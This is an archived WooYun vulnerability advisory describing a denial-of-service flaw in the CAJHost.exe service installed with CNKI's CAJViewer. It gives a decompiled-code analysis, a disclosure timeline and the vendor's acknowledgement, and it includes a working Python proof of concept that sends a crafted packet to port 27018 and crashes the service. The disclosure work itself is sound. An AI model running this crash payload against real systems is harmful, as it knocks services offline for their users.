当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036754

漏洞标题:中国知网CAJViewer阅读器拒绝服务漏洞

相关厂商:中国知网

漏洞作者: cssembly

提交时间:2013-09-11 11:00

修复时间:2013-12-10 11:01

公开时间:2013-12-10 11:01

漏洞类型:拒绝服务

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-11: 细节已通知厂商并且等待厂商处理中
2013-09-15: 厂商已经确认,细节仅向厂商公开
2013-09-18: 细节向第三方安全合作伙伴开放
2013-11-09: 细节向核心白帽子及相关领域专家公开
2013-11-19: 细节向普通白帽子公开
2013-11-29: 细节向实习白帽子公开
2013-12-10: 细节向公众公开

简要描述:

CAJHost.exe是CAJViewer安装的一个服务程序,该程序存在拒绝服务漏洞

详细说明:

漏洞位置在sub_401790函数

.PNG


程序首先通过v4 = recv(s, buf, 0x28u, 0);接受0x28字节,然后判断前四个字节是否大于0x100000且不为负,当接收到数据的前四个字节为0xFFFFFFFF时,程序跳转至Lable_16

1.PNG


v19为接受到数据的第二个dword,当v19为3时,由于v2此时并未分配空间,导致访问出错,拒绝服务。

2.PNG


同理,当v19为6时,执行sub_4021B0函数,此时v2并未分配空间,如果此时C:\Documents and Settings\All Users\Documents\TTKN\drm\p12目录下存在文件,则调用strcmp函数发生访问异常,拒绝服务。

漏洞证明:

poc代码如下:
import socket
HOST = '127.0.0.1'
PORT = 27018
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# first
#exploit = "\xff\xff\xff\xff" + '\x03\x00\x00\x00' + 'A' * (0x28 - 5)
#s.send( exploit )
# second
exploit = "\xff\xff\xff\xff" + '\x06\x00\x00\x00' + 'A' * (0x28 - 5)
s.send( exploit )
s.close()
证明:

3.PNG


程序正常运行,运行第一段poc后,程序崩溃

4.PNG


同理运行第二段poc

5.PNG


6.PNG

修复方案:

版权声明:转载请注明来源 cssembly@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-09-15 23:29

厂商回复:

最新状态:

暂无